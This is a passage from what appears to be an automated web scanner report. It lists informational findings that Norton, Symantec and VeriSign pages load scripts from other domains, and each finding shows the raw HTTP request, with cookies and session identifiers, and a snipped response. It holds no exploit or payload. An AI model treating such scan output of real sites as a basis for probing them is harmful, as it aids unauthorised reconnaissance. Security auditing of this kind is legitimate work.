<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Computer Support &amp; Computer Tech Support | NortonLive</title>
<meta http
...[SNIP]...
</script>
   <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js"></script>
...[SNIP]...

15.28. http://us.norton.com/nortonlive/spyware-virus-removal.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /nortonlive/spyware-virus-removal.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /nortonlive/spyware-virus-removal.jsp?inid=us_hho_support_topnav1_viruses&risks HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=utf-8
Cache-Control: public, max-age=3123
Date: Fri, 09 Sep 2011 21:47:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36294

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Virus Removal &amp; Malware Removal Service | NortonLive</title>
<meta http-
...[SNIP]...
</script>
   <script type="text/javascript" src="http://marchex.voicestar.com/euinc/number-changer.js">
   </script>
...[SNIP]...

15.29. http://us.norton.com/products/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /products/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1696
Date: Fri, 09 Sep 2011 21:47:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 40963

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Protect your computer and remove adware and spyware with Norton 360</title>
<meta http-equiv="Content-Type" content
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.30. http://us.norton.com/security_response/index.jsp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://us.norton.com
Path:   /security_response/index.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /security_response/index.jsp HTTP/1.1
Host: us.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Content-Type: text/html;charset=UTF-8
Cache-Control: public, max-age=1815
Date: Fri, 09 Sep 2011 21:47:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 67812

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>Viruses and Risks - Exploits - Virus Protection | Security Response</title>

...[SNIP]...
</div>

<script language="JavaScript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js" type="text/javascript"></script>
...[SNIP]...

15.31. http://www.symantec.com/connect/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.symantec.com
Path:   /connect/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /connect/ HTTP/1.1
Host: www.symantec.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://searchg.symantec.com/search?as_sitesearch=www.symantec.com/connect/blogs&q=xss&charset=utf-8&proxystylesheet=symc_en_US&client=symc_en_US&hitsceil=100&site=symc_en_US&output=xml_no_dtd&context=ent&x=0&y=0&ie=UTF-8&ip=50.23.123.106&access=p&sort=date:D:L:d1&entqr=0&entsp=a&oe=UTF-8&ud=1
Cookie: s_sess=%20s_sv_sid%3D1175532390374%3B%20init_search%3Dxss%2520site%253Awww.symantec.com%252Fconnect%252Fblogs%3B%20s_cc%3Dtrue%3B%20s_sq%3Dveritasnonconsumer%253D%252526pid%25253Dhttp%2525253A%2525252F%2525252Fsearchg.symantec.com%2525252Fsearch%2525253Fas_sitesearch%2525253Dwww.symantec.com%2525252Fconnect%2525252Fblogs%25252526q%2525253Dxss%25252526charset%2525253Dutf-8%25252526proxystylesheet%2525253Dsymc_en_US%25252526client%2525253Dsymc_en_US%25252526hitsceil%2525253D100%25252526site%2525253Dsymc_en_US%25252526output%2525253Dxml_no_dtd%25252526context%2525253Dent%25252526x%2525253D0%25252526y%2525253D0%25252526ie%2525253DUTF-8%25252526ip%2525253D50.23.123.106%25252526access%2525253Dp%25252526sort%2525253Ddat%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fconnect%252526ot%25253DA%2526veritasbizmarketing%253D%252526pid%25253Den%2525252Fus%2525253A%25252520biz%2525253A%25252520products%2525253A%25252520overview%2525253A%25252520information%25252520risk%25252520%25252526%25252520compliance%2525253A%25252520verisign%25252520identity%25252520protection%25252520fraud%25252520detection%25252520service%2525253A%25252520gnps6ed59%252526pidt%25253D1%252526oid%25253Dhttp%2525253A%2525252F%2525252Fwww.symantec.com%2525252Fimages%2525252Fmasthead%2525252Fsym-search-arrow.gif%252526ot%25253DIMAGE%3B; s_pers=%20s_nr%3D1315622057794-New%7C1336358057794%3B%20event69%3Devent69%7C1336358057796%3B; s_vi=[CS]v1|273542F98514ADEA-6000018C80043EDA[CE]

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Last-Modified: Fri, 09 Sep 2011 21:03:21 +0000
Vary: Cookie
ETag: "1315602201"
Content-Type: text/html; charset=utf-8
X-Varnish: 1369354087 1369326710
X-Varnish-Cache: HIT
X-Varnish-Hits: 287
Vary: Accept-Encoding
Content-Length: 80043
Cache-Control: public, max-age=1794
Date: Fri, 09 Sep 2011 21:34:13 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">

<head>
<met
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
...[SNIP]...

15.32. http://www.verisign.ch/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /?tid=header-logo HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/contact-information/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621600|session#1315621535113-743172#1315623400; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.2.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 31344

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</div>
       
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
</script>
       
       
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/home/js/home.js?071211"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js"></script>
...[SNIP]...

15.33. http://www.verisign.ch/contact-information/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /contact-information/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /contact-information/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 39107

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="stylesheet" href="/assets/corp/css/corp_generic_st
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
</div>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

15.34. http://www.verisign.ch/corporate/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /corporate/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/index.html?tid=footer HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621596|session#1315621535113-743172#1315623396; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.1.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 36193

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>
<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/vrsnMainJSScripts.js" language="JavaScript"></script>

<script type="text/JavaScript" src="http://cdn.verisign.com/stellent/fragments/vrsnJSAssets/seal.js" language="JavaScript"></script>

<script type="text/JavaScript" src="//www.verisign.com/hp07/j/swfobj.js">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
<div id="playerTVAD">
   

        <script src="http://player.ooyala.com/player.js?callback=receiveOoyalaEvent&playerId=ooyalaPlayer_44h86_g6tvkk69&width=488&height=335&embedCode=5rbzB2MTrK9lAvHdEslUi3qJGrQInV_c&wmode=transparent">
</script>
...[SNIP]...
</div>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...

15.35. http://www.verisign.ch/trust-seal/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.ch
Path:   /trust-seal/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /trust-seal/index.html?tid=gnps HTTP/1.1
Host: www.verisign.ch
Proxy-Connection: keep-alive
Referer: http://www.verisign.ch/corporate/index.html?tid=footer
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=85AC46EBE3E5BE40; mbox=check#true#1315621625|session#1315621535113-743172#1315623425|PC#1315621455064-973488.19#1378693568; __utma=173548476.138500938.1315621535.1315621535.1315621535.1; __utmb=173548476.3.10.1315621535; __utmc=173548476; __utmz=173548476.1315621535.1.1.utmcsr=query.verisign.com|utmccn=(referral)|utmcmd=referral|utmcct=/search

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html
Content-Length: 50059

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>VeriSign Trust Seal - Perfec
...[SNIP]...
</script>


<script type="text/JavaScript" src="https://www.verisign.com/js/mbox.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
<div id="header_seal">
                       <script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.verisign.ch&amp;size=S&amp;use_flash=YES&amp;use_transparent=YES&amp;lang=en"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
<div id="vid_container">


<script src="http://player.ooyala.com/player.js?width=356&height=224&embedCode=w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG&wmode=transparent">
</script>
...[SNIP]...
</p>
<script type="text/javascript" src="http://cdn.verisign.com/stellent/fragments/www_chatNow/zig.js"></script>
...[SNIP]...
</script>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js"></script>
...[SNIP]...
</div>

       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js"></script>
       <script type="text/javascript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js?082911"></script>

                   <script type="text/javascript" src="http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js"></script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://cdn.verisign.com/assets/shared/js/curvycorners.js"></script>
...[SNIP]...
<!-- Promo script-->
<script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js">
</script>
...[SNIP]...
<!-- Pre-load promo images to display correctly in promo-->
<script type="text/JavaScript" src="http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js">
</script>
...[SNIP]...

15.36. http://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621516|session#1315621455064-973488#1315623316|PC#1315621455064-973488.19#1378693458; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.1.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:24:37 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:24:37 GMT
Content-Type: text/html
Content-Length: 34615

<!DOCTYPE html>
<html lang="">
   <head>
       <title>VeriSign Authentication Services - The leading Provider of SSL. Products include SSL, SSL Certificates, Extended Validation (EV SSL), VeriSign Trust Sea
...[SNIP]...
</script>
<script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...

15.37. http://www.verisign.com/code-signing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /code-signing/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /code-signing/index.html?tid=a_box HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; mbox=session#1315621455064-973488#1315623513|PC#1315621455064-973488.19#1378693653|check#true#1315621713; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:27:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:27:08 GMT
Content-Type: text/html
Content-Length: 103179

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

   <!--HEADER ASSETS
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...
</script>
   <script type="text/javascript" src="https://www.googleadservices.com/pagead/conversion.js">
   </script>
...[SNIP]...

15.38. http://www.verisign.com/partners/ssl-reseller-programs/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/ssl-reseller-programs/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623565|PC#1315621455064-973488.19#1378693705|check#true#1315621765

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:13 GMT
Content-Type: text/html
Content-Length: 51846

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...

15.39. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/ssl-reseller-programs/resell-ssl/enrollment/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623590|PC#1315621455064-973488.19#1378693730|check#true#1315621790; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-; IS3_History=1315509977-2-99____; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.9.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:24 GMT
Content-Type: text/html
Content-Length: 34515

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...

15.40. http://www.verisign.com/partners/ssl-reseller-programs/resell-ssl/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /partners/ssl-reseller-programs/resell-ssl/index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/ssl-reseller-programs/resell-ssl/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ui-tabs-[object Object]=0; v1st=1744DAB8D140F63E; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.8.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=1315509963-1-99____; IS3_GSV=DPL-2_TES-1315621562_PCT-1315621562_GeoIP-50.23.123.106_GeoCo-US_GeoRg-TX_GeoCt-Dallas_GeoNs-_GeoDm-

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:28:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Sun, 09 Oct 2011 21:28:19 GMT
Content-Type: text/html
Content-Length: 37523

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>    
   <!--HEADER ASSETS-->
       <link href="http://cdn.verisign.com/assets/shared/css/header.css" rel="stylesheet" />
       <!--[if lte IE 7
...[SNIP]...
<div class="emailPrint" id="emailPrint">
<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js?username=verisign">
</script>
...[SNIP]...

15.41. http://www.verisign.com/ssl/buy-ssl-certificates/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.verisign.com
Path:   /ssl/buy-ssl-certificates/index.html

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /ssl/buy-ssl-certificates/index.html HTTP/1.1
Host: www.verisign.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
